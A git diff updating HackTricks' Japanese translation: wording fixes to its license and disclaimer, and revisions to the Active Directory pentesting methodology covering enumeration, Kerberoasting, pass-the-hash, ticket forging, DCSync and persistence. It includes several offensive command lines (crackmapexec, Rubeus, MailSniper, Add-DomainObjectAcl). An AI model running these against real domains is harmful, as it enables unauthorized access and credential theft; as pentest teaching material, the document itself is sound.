 - あなたの**SEO**を改善します
 - コンテンツが**15以上の言語に翻訳され**、より多くの人々がこのコンテンツにアクセスできるようになります
-- **HackTricksは**人々に**あなたのページをチェックすることを奨励します**（何人かの人々が、彼らのページがHackTricksに掲載されて以来、訪問者が増えたと私たちに言っています）
+- **HackTricksは**人々に**あなたのページをチェックすることを奨励します**（何人かの人々が、彼らのページがHackTricksにあるために訪問者が増えたと私たちに言っています）
 
 しかし、もしあなたがまだあなたのブログのコンテンツをHackTricksから削除したい場合は、お知らせください。私たちは確実に**あなたのブログへのすべてのリンク**とそれに基づくコンテンツを**削除します**。
 
 > [!CAUTION]
 >
-> - **HackTricksにコピー＆ペーストされたコンテンツを見つけた場合はどうすればよいですか？**
+> - **HackTricksにコピー＆ペーストされたコンテンツを見つけたらどうすればよいですか？**
 
-私たちは常に**元の著者にすべてのクレジットを与えます**。元のソースが参照されていないコピー＆ペーストされたコンテンツのあるページを見つけた場合は、お知らせください。私たちはそれを**削除する**か、**テキストの前にリンクを追加する**か、**リンクを追加して書き直す**かします。
+私たちは常に**元の著者にすべてのクレジットを与えます**。元のソースが参照されていないコピー＆ペーストされたコンテンツのあるページを見つけたら、お知らせください。私たちはそれを**削除する**か、**テキストの前にリンクを追加する**か、**リンクを追加して書き直す**かします。
 
 ## LICENSE
 
@@ -111,8 +111,8 @@ Copyright © All rights reserved unless otherwise specified.
 #### License Summary:
 
 - Attribution: あなたは自由に：
-- Share — いかなる媒体または形式で資料をコピーおよび再配布できます。
-- Adapt — 資料をリミックス、変換、構築できます。
+- Share — いかなる媒体または形式であっても、資料をコピーして再配布できます。
+- Adapt — 資料をリミックス、変形、構築できます。
 
 #### Additional Terms:
 
@@ -123,21 +123,15 @@ Copyright © All rights reserved unless otherwise specified.
 
 - Commercial Use: このコンテンツの商業利用に関する問い合わせは、私にご連絡ください。
 
-このライセンスは、コンテンツに関する商標またはブランド権を付与するものではありません。このブログ/書籍に掲載されているすべての商標およびブランドは、それぞれの所有者の財産です。
+このライセンスは、コンテンツに関する商標またはブランディングの権利を付与するものではありません。このブログ/書籍に掲載されているすべての商標およびブランディングは、それぞれの所有者の財産です。
 
 **HackTricksにアクセスまたは使用することにより、あなたはこのライセンスの条件に従うことに同意します。これらの条件に同意しない場合は、このウェブサイトにアクセスしないでください。**
 
-## **Disclaimer**
+## **免責事項**
 
 > [!CAUTION]
-> この書籍「HackTricks」は、教育および情報提供の目的のみを意図しています。この書籍内のコンテンツは「現状のまま」提供されており、著者および出版社は、情報、製品、サービス、またはこの書籍に含まれる関連グラフィックスの完全性、正確性、信頼性、適合性、または可用性について、明示または暗示のいかなる表明または保証も行いません。そのため、あなたがそのような情報に依存することは、厳密に自己責任となります。
+> この書籍「HackTricks」は、教育および情報提供の目的のみを意図しています。この書籍内のコンテンツは「現状のまま」提供されており、著者および出版社は、情報、製品、サービス、またはこの書籍に含まれる関連グラフィックスの完全性、正確性、信頼性、適合性、または可用性について、明示または暗示のいかなる表明や保証も行いません。そのため、そのような情報に依存することは、厳密に自己責任となります。
 >
 > 著者および出版社は、データや利益の損失から生じる、またはこの書籍の使用に関連するいかなる損失や損害についても、一切責任を負いません。
 >
-> さらに、この書籍に記載されている技術やヒントは、教育および情報提供の目的のみを意図しており、違法または悪意のある活動に使用すべきではありません。著者および出版社は、違法または非倫理的な活動を容認または支持せず、この書籍に含まれる情報の使用は、ユーザー自身のリスクと裁量に委ねられます。
->
-> ユーザーは、この書籍に含まれる情報に基づいて行った行動に対して単独で責任を負い、ここに記載されている技術やヒントを実行しようとする際には、常に専門的なアドバイスと支援を求めるべきです。
->
-> この書籍を使用することにより、ユーザーは著者および出版社を、この書籍またはその情報の使用から生じる可能性のある損害、損失、または害に対する一切の責任および責任から解放することに同意します。
-
-{{#include ../banners/hacktricks-training.md}}
+> さらに、この書籍に記載されている技術やヒントは、教育および情報提供の目的のみを意図しており、違法または悪意のある活動に使用すべ
diff --git a/src/windows-hardening/active-directory-methodology/README.md b/src/windows-hardening/active-directory-methodology/README.md
index dbf39f30d..792da01fd 100644
--- a/src/windows-hardening/active-directory-methodology/README.md
+++ b/src/windows-hardening/active-directory-methodology/README.md
@@ -21,7 +21,7 @@
 1. **ドメインサービス** – データストレージを集中化し、**ユーザー**と**ドメイン**間の相互作用を管理し、**認証**および**検索**機能を含みます。
 2. **証明書サービス** – 安全な**デジタル証明書**の作成、配布、および管理を監督します。
 3. **軽量ディレクトリサービス** – **LDAPプロトコル**を通じてディレクトリ対応アプリケーションをサポートします。
-4. **ディレクトリ連携サービス** – 複数のWebアプリケーションでのユーザー認証を単一セッションで行う**シングルサインオン**機能を提供します。
+4. **ディレクトリフェデレーションサービス** – 複数のWebアプリケーションでのユーザー認証を単一のセッションで行う**シングルサインオン**機能を提供します。
 5. **権利管理** – 著作権資料を保護し、その無断配布および使用を規制するのを支援します。
 6. **DNSサービス** – **ドメイン名**の解決に重要です。
 
@@ -41,8 +41,8 @@
 AD環境にアクセスできるが、クレデンシャル/セッションがない場合は、次のことができます：
 
 - **ネットワークのペンテスト:**
-- ネットワークをスキャンし、マシンやオープンポートを見つけ、**脆弱性を悪用**したり、そこから**クレデンシャルを抽出**したりします（例えば、[プリンターは非常に興味深いターゲットになる可能性があります](ad-information-in-printers.md)）。
-- DNSを列挙することで、ドメイン内の主要なサーバーに関する情報を得ることができます。ウェブ、プリンター、共有、VPN、メディアなど。
+- ネットワークをスキャンし、マシンやオープンポートを見つけ、そこから**脆弱性を悪用**したり、**クレデンシャルを抽出**したりします（例えば、[プリンターは非常に興味深いターゲットになる可能性があります](ad-information-in-printers.md)）。
+- DNSを列挙することで、ドメイン内の重要なサーバーに関する情報を得ることができます。ウェブ、プリンター、共有、VPN、メディアなど。
 - `gobuster dns -d domain.local -t 25 -w /opt/Seclist/Discovery/DNS/subdomain-top2000.txt`
 - 一般的な[**ペンテスト手法**](../../generic-methodologies-and-resources/pentesting-methodology.md)を確認して、これを行う方法についての詳細情報を見つけてください。
 - **smbサービスでのnullおよびGuestアクセスを確認**（これは最新のWindowsバージョンでは機能しません）：
@@ -69,7 +69,7 @@ AD環境にアクセスできるが、クレデンシャル/セッションが
 - [**悪意のあるUPnPサービスを公開してクレデンシャルを収集**](../../generic-methodologies-and-resources/pentesting-network/spoofing-ssdp-and-upnp-devices.md)[**SDP**](https://medium.com/@nickvangilder/exploiting-multifunction-printers-during-a-penetration-test-engagement-28d3840d8856)
 - [**OSINT**](https://book.hacktricks.xyz/external-recon-methodology):
 - 内部文書、ソーシャルメディア、サービス（主にウェブ）からユーザー名/名前を抽出し、公開されている情報からも収集します。
-- 会社の従業員の完全な名前が見つかった場合、さまざまなAD **ユーザー名の規則**を試すことができます（[**これを読む**](https://activedirectorypro.com/active-directory-user-naming-convention/)）。最も一般的な規則は：_NameSurname_、_Name.Surname_、_NamSur_（各3文字）、_Nam.Sur_、_NSurname_、_N.Surname_、_SurnameName_、_Surname.Name_、_SurnameN_、_Surname.N_、3 _ランダムな文字と3つのランダムな数字_（abc123）です。
+- 会社の従業員の完全な名前が見つかった場合、さまざまなAD **ユーザー名の慣習**を試すことができます（[**これを読む**](https://activedirectorypro.com/active-directory-user-naming-convention/)）。最も一般的な慣習は：_NameSurname_、_Name.Surname_、_NamSur_（各3文字）、_Nam.Sur_、_NSurname_、_N.Surname_、_SurnameName_、_Surname.Name_、_SurnameN_、_Surname.N_、3 _ランダムな文字と3つのランダムな数字_（abc123）です。
 - ツール：
 - [w0Tx/generate-ad-username](https://github.com/w0Tx/generate-ad-username)
 - [urbanadventurer/username-anarchy](https://github.com/urbanadventurer/username-anarchy)
@@ -90,7 +90,7 @@ crackmapexec smb dominio.es  -u '' -p '' --users | awk '{print $4}' | uniq
 ```
 - **OWA (Outlook Web Access) サーバー**
 
-ネットワーク内でこれらのサーバーの1つを見つけた場合、**ユーザー列挙を実行することもできます**。例えば、ツール [**MailSniper**](https://github.com/dafthack/MailSniper) を使用することができます：
+ネットワーク内でこれらのサーバーの1つを見つけた場合、**ユーザー列挙を実行することもできます**。たとえば、ツール [**MailSniper**](https://github.com/dafthack/MailSniper) を使用できます：
 ```bash
 ipmo C:\Tools\MailSniper\MailSniper.ps1
 # Get info about the domain
@@ -139,9 +139,9 @@ password-spraying.md
 ../ntlm/places-to-steal-ntlm-creds.md
 {{#endref}}
 
-## 認証情報/セッションを使用したアクティブディレクトリの列挙
+## 資格情報/セッションを使用したアクティブディレクトリの列挙
 
-このフェーズでは、**有効なドメインアカウントの認証情報またはセッションを侵害している必要があります。** 有効な認証情報またはドメインユーザーとしてのシェルがある場合、**前に示したオプションは他のユーザーを侵害するためのオプションとして依然として有効です**。
+このフェーズでは、**有効なドメインアカウントの資格情報またはセッションを侵害している必要があります。** 有効な資格情報またはドメインユーザーとしてのシェルがある場合、**前に示したオプションは他のユーザーを侵害するためのオプションとして依然として有効です**。
 
 認証された列挙を開始する前に、**Kerberosダブルホップ問題**が何であるかを知っておく必要があります。
 
@@ -156,9 +156,9 @@ kerberos-double-hop-problem.md
 [**ASREPRoast**](asreproast.md)に関しては、今やすべての可能な脆弱なユーザーを見つけることができ、[**Password Spraying**](password-spraying.md)に関しては、**すべてのユーザー名のリスト**を取得し、侵害されたアカウントのパスワード、空のパスワード、新しい有望なパスワードを試すことができます。
 
 - [**CMDを使用して基本的なリコンを実行**](../basic-cmd-for-pentesters.md#domain-info)できます。
-- [**PowerShellを使用してリコンを実行**](../basic-powershell-for-pentesters/)することもでき、よりステルス性があります。
+- [**PowerShellを使用してリコン**](../basic-powershell-for-pentesters/)することもでき、よりステルス性があります。
 - [**PowerViewを使用**](../basic-powershell-for-pentesters/powerview.md)して、より詳細な情報を抽出できます。
-- アクティブディレクトリのリコンに最適なツールは[**BloodHound**](bloodhound.md)です。これは**あまりステルス性がありません**（使用する収集方法によります）が、**それを気にしないのであれば**、ぜひ試してみてください。ユーザーがRDPできる場所を見つけたり、他のグループへのパスを見つけたりします。
+- アクティブディレクトリのリコンに最適なツールは[**BloodHound**](bloodhound.md)です。**あまりステルス性はありません**（使用する収集方法によります）が、**それを気にしないのであれば**、ぜひ試してみてください。ユーザーがRDPできる場所を見つけたり、他のグループへのパスを見つけたりします。
 - **他の自動化されたAD列挙ツールは：** [**AD Explorer**](bloodhound.md#ad-explorer)**,** [**ADRecon**](bloodhound.md#adrecon)**,** [**Group3r**](bloodhound.md#group3r)**,** [**PingCastle**](bloodhound.md#pingcastle)**.**
 - [**ADのDNSレコード**](ad-dns-records.md)は、興味深い情報を含んでいるかもしれません。
 - ディレクトリを列挙するために使用できる**GUIツール**は、**SysInternal**スイートの**AdExplorer.exe**です。
@@ -169,9 +169,33 @@ kerberos-double-hop-problem.md
 - [**61106960/adPEAS**](https://github.com/61106960/adPEAS)
 - **すべてのドメインユーザーの抽出**
 
-Windowsからすべてのドメインユーザー名を取得するのは非常に簡単です（`net user /domain`、`Get-DomainUser`または`wmic useraccount get name,sid`）。Linuxでは、`GetADUsers.py -all -dc-ip 10.10.10.110 domain.com/username`または`enum4linux -a -u "user" -p "password" <DC IP>`を使用できます。
+Windowsからすべてのドメインユーザー名を取得するのは非常に簡単です（`net user /domain`、`Get-DomainUser`または`wmic useraccount get name,sid`）。Linuxでは、次のように使用できます：`GetADUsers.py -all -dc-ip 10.10.10.110 domain.com/username`または`enum4linux -a -u "user" -p "password" <DC IP>`。
 
-> この列挙セクションは小さく見えるかもしれませんが、これはすべての中で最も重要な部分です。リンクにアクセスし（特にcmd、powershell、powerview、BloodH
+> この列挙セクションは小さく見えるかもしれませんが、これはすべての中で最も重要な部分です。リンクにアクセスし（特にcmd、powershell、powerview、BloodHoundのリンク）、ドメインを列挙する方法を学び、快適に感じるまで練習してください。評価中、これはDAへの道を見つけるか、何もできないと決定するための重要な瞬間になります。
+
+### Kerberoast
+
+Kerberoastingは、ユーザーアカウントに関連付けられたサービスによって使用される**TGSチケット**を取得し、その暗号化をクラックすることを含みます—これはユーザーパスワードに基づいており、**オフライン**で行われます。
+
+詳細については：
+
+{{#ref}}
+kerberoast.md
+{{#endref}}
+
+### リモート接続（RDP、SSH、FTP、Win-RMなど）
+
+資格情報を取得したら、**マシン**へのアクセスがあるかどうかを確認できます。そのために、**CrackMapExec**を使用して、ポートスキャンに応じて異なるプロトコルで複数のサーバーに接続を試みることができます。
+
+### ローカル特権昇格
+
+通常のドメインユーザーとしての資格情報またはセッションを侵害し、**ドメイン内の任意のマシンにこのユーザーでアクセス**できる場合、**ローカルで特権を昇格させ、資格情報を盗む**方法を見つけるべきです。これは、ローカル管理者権限がないと、他のユーザーのハッシュをメモリ（LSASS）やローカル（SAM）で**ダンプ**できないためです。
+
+この本には、[**Windowsにおけるローカル特権昇格**](../windows-local-privilege-escalation/)に関する完全なページと、[**チェックリスト**](../checklist-windows-privilege-escalation.md)があります。また、[**WinPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite)を使用することを忘れないでください。
+
+### 現在のセッションチケット
+
+現在のユーザーに**予期しないリソースへのアクセスを許可する**チケットが見つかる可能性は非常に**低い**ですが、確認することができます：
 ```bash
 ## List all tickets (if not admin, only current user tickets)
 .\Rubeus.exe triage
@@ -191,7 +215,7 @@ Windowsからすべてのドメインユーザー名を取得するのは非常
 
 ### NTLMクレデンシャルの盗難
 
-他のPCや共有に**アクセスできる**場合、**ファイル**（SCFファイルなど）を**配置する**ことができ、何らかの形でアクセスされると、**あなたに対してNTML認証をトリガー**し、**NTLMチャレンジを盗む**ことができます：
+他のPCや共有に**アクセスできる**場合、**ファイル**（SCFファイルなど）を**配置する**ことができ、何らかの形でアクセスされると、**あなたに対してNTML認証をトリガー**するので、**NTLMチャレンジを盗む**ことができます：
 
 {{#ref}}
 ../ntlm/places-to-steal-ntlm-creds.md
@@ -217,7 +241,7 @@ printnightmare.md
 
 ### パス・ザ・ハッシュ
 
-**ユーザーのハッシュを取得したら、**それを使用して**そのユーザーを偽装**できます。\
+**ユーザーのハッシュを取得したら**、それを使用して**なりすます**ことができます。\
 その**ハッシュ**を使用して**NTLM認証を実行する**ツールを使用する必要があります。**または**、新しい**sessionlogon**を作成し、その**ハッシュ**を**LSASS**内に**注入**することができます。これにより、**NTLM認証が実行されると、その**ハッシュが使用されます。**最後のオプションはmimikatzが行うことです。\
 [**詳細についてはこのページをお読みください。**](../ntlm/#pass-the-hash)
 
@@ -231,7 +255,7 @@ over-pass-the-hash-pass-the-key.md
 
 ### パス・ザ・チケット
 
-**パス・ザ・チケット（PTT）**攻撃手法では、攻撃者は**ユーザーの認証チケットを盗む**代わりに、パスワードやハッシュ値を盗みます。この盗まれたチケットは、その後**ユーザーを偽装**するために使用され、ネットワーク内のリソースやサービスへの不正アクセスを得ることができます。
+**パス・ザ・チケット（PTT）**攻撃手法では、攻撃者は**ユーザーの認証チケットを盗む**ことで、パスワードやハッシュ値を盗むのではなく、その盗まれたチケットを使用して**ユーザーになりすまし**、ネットワーク内のリソースやサービスに不正アクセスします。
 
 {{#ref}}
 pass-the-ticket.md
@@ -250,8 +274,8 @@ crackmapexec smb --local-auth 10.10.10.10/23 -u administrator -H 10298e182387f9c
 
 ### MSSQLの悪用と信頼されたリンク
 
-ユーザーが**MSSQLインスタンスにアクセスする権限**を持っている場合、MSSQLホストで**コマンドを実行**したり（SAとして実行されている場合）、NetNTLMの**ハッシュ**を**盗む**ことができるか、さらには**リレー攻撃**を行うことができます。\
-また、MSSQLインスタンスが別のMSSQLインスタンスによって信頼されている場合、信頼されたデータベースに対する権限を持つユーザーは、**信頼関係を利用して他のインスタンスでもクエリを実行**できるようになります。これらの信頼は連鎖することができ、ユーザーはコマンドを実行できる誤って構成されたデータベースを見つけることができるかもしれません。\
+ユーザーが**MSSQLインスタンスにアクセスする権限**を持っている場合、MSSQLホストで**コマンドを実行**したり（SAとして実行されている場合）、NetNTLMの**ハッシュ**を**盗む**ことができるか、さらには**リレー****攻撃**を行うことができるかもしれません。\
+また、MSSQLインスタンスが別のMSSQLインスタンスによって信頼されている場合（データベースリンク）。ユーザーが信頼されたデータベースに対して権限を持っている場合、**信頼関係を利用して他のインスタンスでもクエリを実行することができます**。これらの信頼は連鎖することができ、ユーザーはコマンドを実行できる誤設定されたデータベースを見つけることができるかもしれません。\
 **データベース間のリンクは、フォレストの信頼を越えても機能します。**
 
 {{#ref}}
@@ -262,7 +286,7 @@ abusing-ad-mssql.md
 
 [ADS_UF_TRUSTED_FOR_DELEGATION](<https://msdn.microsoft.com/en-us/library/aa772300(v=vs.85).aspx>)属性を持つコンピュータオブジェクトを見つけ、コンピュータにドメイン権限がある場合、コンピュータにログインするすべてのユーザーのメモリからTGTをダンプすることができます。\
 したがって、**ドメイン管理者がコンピュータにログインすると**、そのTGTをダンプして[Pass the Ticket](pass-the-ticket.md)を使用して彼を偽装することができます。\
-制約のある委任のおかげで、**プリントサーバーを自動的に侵害**することさえ可能です（できればDCであることを願っています）。
+制約のある委任のおかげで、**プリントサーバーを自動的に侵害する**ことさえ可能です（できればDCであることを願っています）。
 
 {{#ref}}
 unconstrained-delegation.md
@@ -270,7 +294,7 @@ unconstrained-delegation.md
 
 ### 制約された委任
 
-ユーザーまたはコンピュータが「制約された委任」を許可されている場合、**コンピュータ内のいくつかのサービスにアクセスするために任意のユーザーを偽装**することができます。\
+ユーザーまたはコンピュータが「制約された委任」を許可されている場合、**コンピュータ内のいくつかのサービスにアクセスするために任意のユーザーを偽装することができます**。\
 その後、**このユーザー/コンピュータのハッシュを侵害**すると、**任意のユーザー**（ドメイン管理者を含む）を偽装していくつかのサービスにアクセスすることができます。
 
 {{#ref}}
@@ -295,7 +319,7 @@ acl-persistence-abuse/
 
 ### プリンタースプーラーサービスの悪用
 
-ドメイン内で**スプールサービスがリスニング**していることを発見することは、**新しい資格情報を取得**し、**権限を昇格**させるために**悪用**される可能性があります。
+ドメイン内で**スプールサービスがリッスンしている**ことを発見することは、**新しい資格情報を取得**し、**権限を昇格**させるために**悪用**される可能性があります。
 
 {{#ref}}
 printers-spooler-service-abuse.md
@@ -320,7 +344,7 @@ laps.md
 
 ### 証明書の盗難
 
-**侵害されたマシンから証明書を収集**することは、環境内で権限を昇格させる方法となる可能性があります：
+**侵害されたマシンから証明書を収集する**ことは、環境内で権限を昇格させる方法となる可能性があります：
 
 {{#ref}}
 ad-certificates/certificate-theft.md
@@ -328,7 +352,7 @@ ad-certificates/certificate-theft.md
 
 ### 証明書テンプレートの悪用
 
-**脆弱なテンプレート**が構成されている場合、それを悪用して権限を昇格させることが可能です：
+**脆弱なテンプレート**が設定されている場合、それを悪用して権限を昇格させることが可能です：
 
 {{#ref}}
 ad-certificates/domain-escalation.md
@@ -338,7 +362,7 @@ ad-certificates/domain-escalation.md
 
 ### ドメイン資格情報のダンプ
 
-**ドメイン管理者**またはさらに良い**エンタープライズ管理者**の権限を取得すると、**ドメインデータベース**を**ダンプ**できます：_ntds.dit_。
+**ドメイン管理者**またはさらに良い**エンタープライズ管理者**権限を取得すると、**ドメインデータベース**を**ダンプ**できます：_ntds.dit_。
 
 [**DCSync攻撃に関する詳細情報はここにあります**](dcsync.md)。
 
@@ -369,7 +393,7 @@ Add-DomainObjectAcl -TargetIdentity "DC=SUB,DC=DOMAIN,DC=LOCAL" -PrincipalIdenti
 
 ### シルバーチケット
 
-**シルバーチケット攻撃**は、特定のサービスのために**正当なチケットグラントサービス（TGS）チケット**を**NTLMハッシュ**（例えば、**PCアカウントのハッシュ**）を使用して作成します。この方法は、**サービス権限にアクセス**するために使用されます。
+**シルバーチケット攻撃**は、特定のサービスのために**正当なチケットグラントサービス（TGS）チケット**を**NTLMハッシュ**（例えば、**PCアカウントのハッシュ**）を使用して作成します。この方法は、**サービス権限にアクセスする**ために使用されます。
 
 {{#ref}}
 silver-ticket.md
@@ -387,7 +411,7 @@ golden-ticket.md
 
 ### ダイヤモンドチケット
 
-これらは、**一般的なゴールデンチケット検出メカニズムを回避する方法で偽造されたゴールデンチケットのようなものです。**
+これらは、**一般的なゴールデンチケットの検出メカニズムを回避する**方法で偽造されたゴールデンチケットのようなものです。
 
 {{#ref}}
 diamond-ticket.md
@@ -395,7 +419,7 @@ diamond-ticket.md
 
 ### **証明書アカウントの持続性**
 
-**アカウントの証明書を持っているか、要求できること**は、ユーザーアカウントに持続するための非常に良い方法です（たとえ彼がパスワードを変更しても）：
+**アカウントの証明書を持っているか、要求できること**は、ユーザーアカウントに持続する非常に良い方法です（たとえ彼がパスワードを変更しても）：
 
 {{#ref}}
 ad-certificates/account-persistence.md
@@ -403,7 +427,7 @@ ad-certificates/account-persistence.md
 
 ### **証明書ドメインの持続性**
 
-**証明書を使用することは、ドメイン内で高い権限を持って持続することも可能です：**
+**証明書を使用することは、ドメイン内で高権限を持続することも可能です：**
 
 {{#ref}}
 ad-certificates/domain-persistence.md
@@ -411,13 +435,13 @@ ad-certificates/domain-persistence.md
 
 ### AdminSDHolderグループ
 
-Active Directoryの**AdminSDHolder**オブジェクトは、**特権グループ**（ドメイン管理者やエンタープライズ管理者など）のセキュリティを確保するために、これらのグループ全体に標準の**アクセス制御リスト（ACL）**を適用して、無許可の変更を防ぎます。しかし、この機能は悪用される可能性があります。攻撃者がAdminSDHolderのACLを変更して通常のユーザーに完全なアクセスを与えると、そのユーザーはすべての特権グループに対して広範な制御を得ることになります。このセキュリティ対策は保護を目的としていますが、厳重に監視されない限り、逆効果をもたらす可能性があります。
+Active Directory内の**AdminSDHolder**オブジェクトは、**特権グループ**（ドメイン管理者やエンタープライズ管理者など）のセキュリティを確保するために、これらのグループ全体に標準の**アクセス制御リスト（ACL）**を適用して、無許可の変更を防ぎます。しかし、この機能は悪用される可能性があります。攻撃者がAdminSDHolderのACLを変更して通常のユーザーに完全なアクセスを与えると、そのユーザーはすべての特権グループに対して広範な制御を得ることになります。このセキュリティ対策は保護を目的としていますが、厳重に監視されない限り、逆効果をもたらす可能性があります。
 
 [**AdminDSHolderグループに関する詳細情報はここにあります。**](privileged-groups-and-token-privileges.md#adminsdholder-group)
 
 ### DSRM資格情報
 
-すべての**ドメインコントローラー（DC）**内には、**ローカル管理者**アカウントが存在します。このようなマシンで管理者権限を取得することで、**mimikatz**を使用してローカル管理者のハッシュを抽出できます。その後、このパスワードを**使用できるようにするためのレジストリ変更**が必要で、ローカル管理者アカウントへのリモートアクセスを可能にします。
+すべての**ドメインコントローラー（DC）**内には、**ローカル管理者**アカウントが存在します。このようなマシンで管理者権限を取得することで、**mimikatz**を使用してローカル管理者ハッシュを抽出できます。その後、このパスワードを**使用できるようにするためのレジストリ変更**が必要で、ローカル管理者アカウントへのリモートアクセスを可能にします。
 
 {{#ref}}
 dsrm-credentials.md
@@ -425,7 +449,7 @@ dsrm-credentials.md
 
 ### ACL持続性
 
-特定のドメインオブジェクトに対して**ユーザーに特別な権限**を**与える**ことで、そのユーザーが将来的に**権限を昇格**させることができるようになります。
+特定のドメインオブジェクトに対して**ユーザー**に**特別な権限**を与えることで、そのユーザーが将来的に**権限を昇格**させることができるようになります。
 
 {{#ref}}
 acl-persistence-abuse/
@@ -433,7 +457,7 @@ acl-persistence-abuse/
 
 ### セキュリティ記述子
 
-**セキュリティ記述子**は、**オブジェクト**が**オブジェクト**に対して持つ**権限**を**保存**するために使用されます。オブジェクトの**セキュリティ記述子**に**少し変更**を加えることができれば、特権グループのメンバーである必要なく、そのオブジェクトに対して非常に興味深い権限を取得できます。
+**セキュリティ記述子**は、**オブジェクト**が**オブジェクト**に対して持つ**権限**を**保存**するために使用されます。オブジェクトの**セキュリティ記述子**に**少し変更**を加えることができれば、そのオブジェクトに対して特権グループのメンバーである必要なく非常に興味深い権限を取得できます。
 
 {{#ref}}
 security-descriptors.md
@@ -459,7 +483,7 @@ custom-ssp.md
 ### DCShadow
 
 ADに**新しいドメインコントローラー**を登録し、指定されたオブジェクトに**属性**（SIDHistory、SPNs...）を**プッシュ**するために使用しますが、**変更**に関する**ログ**を残さずに行います。**DA**権限が必要で、**ルートドメイン**内にいる必要があります。\
-不正なデータを使用すると、非常に醜いログが表示されることに注意してください。
+間違ったデータを使用すると、非常に醜いログが表示されることに注意してください。
 
 {{#ref}}
 dcshadow.md
@@ -467,7 +491,7 @@ dcshadow.md
 
 ### LAPS持続性
 
-以前に、**LAPSパスワードを読み取るための十分な権限がある場合に権限を昇格させる方法**について説明しました。しかし、これらのパスワードは**持続性を維持するためにも使用**できます。\
+以前に、**LAPSパスワードを読み取るための十分な権限がある場合**に権限を昇格させる方法について説明しました。しかし、これらのパスワードは**持続性を維持するためにも使用できます**。\
 確認してください：
 
 {{#ref}}
@@ -476,11 +500,11 @@ laps.md
 
 ## フォレスト権限昇格 - ドメイン信頼
 
-Microsoftは**フォレスト**をセキュリティ境界と見なしています。これは、**単一のドメインを侵害することが、フォレスト全体が侵害される可能性があることを意味します**。
+Microsoftは**フォレスト**をセキュリティ境界と見なしています。これは、**単一のドメインを侵害することが、フォレスト全体の侵害につながる可能性がある**ことを意味します。
 
 ### 基本情報
 
-[**ドメイン信頼**](<http://technet.microsoft.com/en-us/library/cc759554(v=ws.10).aspx>)は、ある**ドメイン**のユーザーが別の**ドメイン**のリソースにアクセスできるようにするセキュリティメカニズムです。これは、2つのドメインの認証システム間にリンクを作成し、認証確認がシームレスに流れることを可能にします。ドメインが信頼を設定すると、特定の**キー**を**ドメインコントローラー（DC）**内で交換し保持します。これは信頼の整合性にとって重要です。
+[**ドメイン信頼**](<http://technet.microsoft.com/en-us/library/cc759554(v=ws.10).aspx>)は、1つの**ドメイン**のユーザーが別の**ドメイン**のリソースにアクセスできるようにするセキュリティメカニズムです。これは、2つのドメインの認証システム間にリンクを作成し、認証確認がシームレスに流れることを可能にします。ドメインが信頼を設定すると、特定の**キー**を**ドメインコントローラー（DC）**内で交換し保持します。これは信頼の整合性にとって重要です。
 
 典型的なシナリオでは、ユーザーが**信頼されたドメイン**のサービスにアクセスしようとする場合、最初に自分のドメインのDCから**インターレルムTGT**と呼ばれる特別なチケットを要求する必要があります。このTGTは、両方のドメインが合意した共有**キー**で暗号化されています。ユーザーはこのTGTを**信頼されたドメインのDC**に提示してサービスチケット（**TGS**）を取得します。信頼されたドメインのDCによってインターレルムTGTが正常に検証されると、TGSが発行され、ユーザーはサービスにアクセスできるようになります。
 
@@ -491,35 +515,35 @@ Microsoftは**フォレスト**をセキュリティ境界と見なしていま
 3. クライアントは次に、**ドメイン2**のリソースにアクセスするために必要な**インターレルムTGT**をDC1に要求します。
 4. インターレルムTGTは、DC1とDC2の間で共有された**信頼キー**で暗号化されています。
 5. クライアントはインターレルムTGTを**ドメイン2のドメインコントローラー（DC2）**に持っていきます。
-6. DC2は、共有された信頼キーを使用してインターレルムTGTを検証し、有効であれば、クライアントがアクセスしたいドメイン2のサーバーのために**チケットグラントサービス（TGS）**を発行します。
+6. DC2は、共有信頼キーを使用してインターレルムTGTを検証し、正当であれば、クライアントがアクセスしたいドメイン2のサーバーのために**チケットグラントサービス（TGS）**を発行します。
 7. 最後に、クライアントはこのTGSをサーバーに提示し、サーバーのアカウントハッシュで暗号化されているため、ドメイン2のサービスにアクセスします。
 
 ### 異なる信頼
 
-**信頼は1方向または2方向**であることに注意することが重要です。2方向のオプションでは、両方のドメインが互いに信頼しますが、**1方向**の信頼関係では、一方のドメインが**信頼された**ドメインであり、もう一方が**信頼する**ドメインです。この場合、**信頼されたドメインから信頼するドメイン内のリソースにのみアクセスできる**ことになります。
+**信頼は1方向または2方向**であることに注意することが重要です。2方向のオプションでは、両方のドメインが互いに信頼しますが、**1方向**の信頼関係では、1つのドメインが**信頼された**ものであり、もう1つが**信頼する**ドメインです。この場合、**信頼されたドメインから信頼するドメイン内のリソースにのみアクセスできます**。
 
 ドメインAがドメインBを信頼している場合、Aは信頼するドメインであり、Bは信頼されたドメインです。さらに、**ドメインA**では、これは**アウトバウンド信頼**となり、**ドメインB**では、これは**インバウンド信頼**となります。
 
 **異なる信頼関係**
 
 - **親子信頼**：これは同じフォレスト内で一般的な設定であり、子ドメインは自動的に親ドメインとの双方向の推移的信頼を持ちます。基本的に、これは認証要求が親と子の間でシームレスに流れることを意味します。
-- **クロスリンク信頼**：これは「ショートカット信頼」と呼ばれ、子ドメイン間で確立され、参照プロセスを迅速化します。複雑なフォレストでは、認証参照は通常、フォレストルートまで上昇し、ターゲットドメインまで下降する必要があります。クロスリンクを作成することで、旅が短縮され、特に地理的に分散した環境で有益です。
-- **外部信頼**：これは異なる無関係なドメイン間で設定され、非推移的です。Microsoftの文書によると、外部信頼は、現在のフォレスト外のドメインのリソースにアクセスするために便利であり、フォレスト信頼によって接続されていないドメインに対して有用です。外部信頼ではSIDフィルタリングを通じてセキュリティが強化されます。
-- **ツリー根信頼**：これらの信頼は、フォレストルートドメインと新しく追加されたツリー根の間で自動的に確立されます。一般的には遭遇しませんが、ツリー根信頼は新しいドメインツリーをフォレストに追加するために重要であり、ユニークなドメイン名を維持し、双方向の推移性を確保します。詳細情報はMicrosoftのガイドで確認できます。
+- **クロスリンク信頼**：これは「ショートカット信頼」と呼ばれ、子ドメイン間で設立され、紹介プロセスを迅速化します。複雑なフォレストでは、認証紹介は通常、フォレストルートまで上昇し、ターゲットドメインまで下降する必要があります。クロスリンクを作成することで、旅が短縮され、特に地理的に分散した環境で有益です。
+- **外部信頼**：これは異なる、無関係なドメイン間で設定され、非推移的です。 [Microsoftの文書](<https://technet.microsoft.com/en-us/library/cc773178(v=ws.10).aspx>)によると、外部信頼は、現在のフォレスト外のドメインのリソースにアクセスするために便利であり、フォレスト信頼によって接続されていないドメインに対して有用です。セキュリティは、外部信頼に対するSIDフィルタリングによって強化されます。
